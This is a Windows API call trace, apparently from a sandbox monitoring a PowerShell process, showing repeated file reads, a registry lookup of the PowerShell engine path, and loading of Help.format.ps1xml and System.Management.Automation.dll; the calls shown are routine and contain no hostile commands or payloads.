	[0757.105] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.106] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.106] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.106] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.106] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.108] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.108] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.108] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.109] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.109] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.109] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.110] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.110] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.113] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.114] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.114] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.115] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.115] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.115] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.115] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.116] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.116] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.116] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.117] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.117] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.117] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.380] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.380] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.381] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.387] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.387] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.388] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.388] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.389] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.389] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.389] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.390] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.390] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.390] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.391] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.391] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.392] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.392] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.392] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.393] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.393] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.393] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.394] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.394] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.394] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.395] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.395] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.396] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.396] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.396] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.397] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.397] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.397] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.398] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0758.398] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0xf37, lpOverlapped=0x0) returned 1
	[0758.398] ReadFile (in: hFile=0x318, lpBuffer=0x33ed8af, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ed8af*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0758.399] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0758.399] CloseHandle (hObject=0x318) returned 1
	[0758.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0758.399] SetErrorMode (uMode=0x1) returned 0x1
	[0758.399] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf00 | out: lpFileInformation=0xccf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0758.399] SetErrorMode (uMode=0x1) returned 0x1
	[0758.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0758.400] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x318) returned 0x0
	[0758.400] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0
	[0758.400] CoTaskMemAlloc (cb=0x5a) returned 0x1b805760
	[0758.400] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x1b805760, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0
	[0758.400] CoTaskMemFree (pv=0x1b805760) 
	[0758.400] RegCloseKey (hKey=0x318) returned 0x0
	[0758.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0758.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0758.405] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x8e89d9ba, Data2=0xfd8e, Data3=0x45d3, Data4=([0]=0xa7, [1]=0x13, [2]=0x35, [3]=0xb0, [4]=0xcf, [5]=0xe7, [6]=0x4c, [7]=0x35))) returned 0x0
	[0758.405] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x2ad3f22c, Data2=0xd13a, Data3=0x4d23, Data4=([0]=0x80, [1]=0x57, [2]=0x29, [3]=0x83, [4]=0x48, [5]=0x2d, [6]=0x9e, [7]=0xce))) returned 0x0
	[0759.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.664] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xdaeea1ef, Data2=0x33e9, Data3=0x4501, Data4=([0]=0x8c, [1]=0x3a, [2]=0xd1, [3]=0x78, [4]=0x31, [5]=0x4c, [6]=0x5b, [7]=0xa6))) returned 0x0
	[0759.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
